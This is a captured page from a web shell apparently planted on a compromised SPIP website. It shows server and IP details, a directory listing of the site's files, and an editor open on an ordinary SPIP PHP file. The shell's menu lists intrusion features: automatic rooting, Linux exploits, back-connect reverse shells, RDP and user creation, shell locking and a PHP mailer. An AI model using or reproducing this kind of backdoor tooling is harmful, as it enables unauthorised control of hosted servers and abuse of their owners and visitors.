Linux webm008.cluster115.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.115.20.8 | : 216.73.216.59
Cant Read [ /etc/named.conf ]
8.1.34
quelfutuu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
quelfutuu /
www /
prive /
objets /
liste /
[ HOME SHELL ]
Name
Size
Permission
Action
articles-memerubrique.html
107
B
-rw----r--
articles-trad.html
2.62
KB
-rw----r--
articles.html
2.51
KB
-rw----r--
articles_associer.html
2.76
KB
-rw----r--
articles_fonctions.php
1.31
KB
-rw----r--
articles_lies.html
2.51
KB
-rw----r--
auteurs.html
3.9
KB
-rw----r--
auteurs_associer.html
4.01
KB
-rw----r--
auteurs_associer_fonctions.php
735
B
-rw----r--
auteurs_enligne.html
459
B
-rw----r--
auteurs_fonctions.php
4.77
KB
-rw----r--
auteurs_lies.html
3.95
KB
-rw----r--
auteurs_lies_fonctions.php
735
B
-rw----r--
jobs.html
3.43
KB
-rw----r--
objets-en-edition.html
814
B
-rw----r--
objets-en-edition_fonctions.ph...
718
B
-rw----r--
objets-trad.html
2.37
KB
-rw----r--
objets-trad_fonctions.php
1.18
KB
-rw----r--
objets.html
1.76
KB
-rw----r--
rubriques.html
1.88
KB
-rw----r--
rubriques_associer.html
2.79
KB
-rw----r--
rubriques_lies.html
2.55
KB
-rw----r--
visiteurs.html
3.49
KB
-rw----r--
visiteurs_fonctions.php
735
B
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : articles_fonctions.php
<?php /***************************************************************************\ * SPIP, Système de publication pour l'internet * * * * Copyright © avec tendresse depuis 2001 * * Arnaud Martin, Antoine Pitrou, Philippe Rivière, Emmanuel Saint-James * * * * Ce programme est un logiciel libre distribué sous licence GNU/GPL. * \***************************************************************************/ if (!defined('_ECRIRE_INC_VERSION')) { return; } function defaut_tri_defined($defaut) { if (!defined('_TRI_ARTICLES_RUBRIQUE')) { return $defaut; } $sens = 1; $tri = trim(_TRI_ARTICLES_RUBRIQUE); $tri = explode(' ', $tri); if (strncasecmp(end($tri), 'DESC', 4) == 0) { $sens = -1; array_pop($tri); } elseif (strncasecmp(end($tri), 'ASC', 3) == 0) { $sens = 1; array_pop($tri); } $tri = implode(' ', $tri); $tri = [$tri => $sens]; foreach ($defaut as $n => $s) { if (!isset($tri[$n])) { $tri[$n] = $s; } } return $tri; } function defaut_tri_par($par, $defaut) { if (!defined('_TRI_ARTICLES_RUBRIQUE')) { return $par; } $par = array_keys($defaut); return reset($par); }
Close